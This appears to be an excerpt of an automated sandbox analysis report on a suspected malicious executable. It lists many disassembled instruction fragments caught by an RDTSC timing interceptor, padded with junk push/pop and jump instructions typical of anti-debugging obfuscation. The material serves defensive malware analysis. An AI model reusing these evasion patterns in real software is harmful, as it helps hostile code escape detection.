    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB472 second address: ABB478 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB60B second address: ABB60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB60F second address: ABB613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB613 second address: ABB619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB619 second address: ABB637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5100BF03F8h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB637 second address: ABB63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB63B second address: ABB647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB786 second address: ABB78B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFFE5 second address: ABFFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03F5h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFFFE second address: AC0002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0002 second address: AC0028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5100BF03E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F5100BF03E6h 0x00000014 jmp 00007F5100BF03F2h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0028 second address: AC003F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jns 00007F5100C93C25h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01CD second address: AC01D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01D1 second address: AC01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC05EC second address: AC05F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC05F2 second address: AC0601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnl 00007F5100C93C06h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0601 second address: AC0605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC073B second address: AC0741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0741 second address: AC0750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnp 00007F5100BF03E6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFCD0 second address: ABFCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5100C93C06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFCDF second address: ABFCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03F4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFCF7 second address: ABFD0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFD0D second address: ABFD2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90FA6 second address: A90FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0B9E second address: AC0BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F5100BF03E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0BAD second address: AC0BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F5100C93C18h 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC66B1 second address: AC66B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC66B9 second address: AC66BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC66BF second address: AC66C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC66C3 second address: AC66C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89E4A second address: A89E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A89E6D second address: A738B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 sbb ch, 0000004Fh 0x0000000a call dword ptr [ebp+122D1AA7h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5100C93C10h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A005 second address: A8A009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A2B2 second address: A8A2B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A663 second address: A8A69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007F5100BF03E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 sbb edi, 55955A61h 0x00000017 add ecx, dword ptr [ebp+122D3C10h] 0x0000001d nop 0x0000001e pushad 0x0000001f je 00007F5100BF03ECh 0x00000025 jng 00007F5100BF03E6h 0x0000002b push ebx 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e pop ebx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 push eax 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AF27 second address: A8AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AF2D second address: A8AF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F5100BF03F3h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jo 00007F5100BF03F3h 0x00000016 push edi 0x00000017 jmp 00007F5100BF03EBh 0x0000001c pop edi 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AF65 second address: A8AF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B01F second address: A8B0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5100BF03E6h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5100BF03F2h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F5100BF03E8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D32C8h], eax 0x00000032 lea eax, dword ptr [ebp+12479BB1h] 0x00000038 mov dword ptr [ebp+122D17E7h], ebx 0x0000003e push eax 0x0000003f jmp 00007F5100BF03EEh 0x00000044 mov dword ptr [esp], eax 0x00000047 sbb dh, 0000002Bh 0x0000004a lea eax, dword ptr [ebp+12479B6Dh] 0x00000050 jmp 00007F5100BF03F3h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B0A7 second address: A8B0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B0AC second address: A74473 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5100BF03ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e movsx edx, cx 0x00000011 mov ecx, dword ptr [ebp+122D1A7Ch] 0x00000017 popad 0x00000018 call dword ptr [ebp+122D3004h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5100BF03F0h 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74473 second address: A744AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jl 00007F5100C93C06h 0x0000000d popad 0x0000000e push esi 0x0000000f jnc 00007F5100C93C06h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jp 00007F5100C93C38h 0x00000020 jmp 00007F5100C93C16h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5863 second address: AC5892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F5100BF03E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F5100BF03F2h 0x00000012 pushad 0x00000013 jmp 00007F5100BF03EDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5B44 second address: AC5B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5B4A second address: AC5B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5B4E second address: AC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnp 00007F5100C93C06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5D0F second address: AC5D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5100BF03EFh 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5D23 second address: AC5D28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5FAC second address: AC5FB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5FB7 second address: AC5FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6124 second address: AC612A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC612A second address: AC6142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jbe 00007F5100C93C06h 0x0000000c pop esi 0x0000000d pushad 0x0000000e jnp 00007F5100C93C06h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6142 second address: AC615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jp 00007F5100BF03E6h 0x0000000f jbe 00007F5100BF03E6h 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC615D second address: AC6162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC737 second address: ACC73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC73D second address: ACC74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5100C93C06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC74C second address: ACC752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC752 second address: ACC756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A436D3 second address: A436D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0D74 second address: AD0D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0D78 second address: AD0D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1472 second address: AD1476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1476 second address: AD147A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD147A second address: AD1480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1480 second address: AD1486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD184E second address: AD185E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F5100C93C08h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1A01 second address: AD1A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1A07 second address: AD1A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1A0B second address: AD1A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2056 second address: AD205C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD205C second address: AD2073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100BF03F2h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0957 second address: AD095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6452 second address: AD6456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6456 second address: AD6478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5100C93C0Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F5100C93C06h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6478 second address: AD6484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5100BF03E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6484 second address: AD648A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD648A second address: AD6492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6492 second address: AD64C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F5100C93C12h 0x00000010 jmp 00007F5100C93C13h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD64C1 second address: AD64D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5100BF03F3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD64D8 second address: AD6502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 jmp 00007F5100C93C13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F5100C93C0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD613D second address: AD614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84AE second address: AD84BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84BB second address: AD84C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84C1 second address: AD84EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F5100C93C14h 0x0000000b jnc 00007F5100C93C06h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push edx 0x00000017 pop edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop ebx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84EB second address: AD84F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84F1 second address: AD84FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5100C93C06h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD84FB second address: AD84FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9E6B second address: AD9E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D987 second address: A4D9A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5100BF03E6h 0x00000008 jmp 00007F5100BF03EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D9A3 second address: A4D9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4888D second address: A48891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48891 second address: A48895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE185A second address: AE1868 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1868 second address: AE1892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5100C93C15h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1892 second address: AE1898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1898 second address: AE189C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
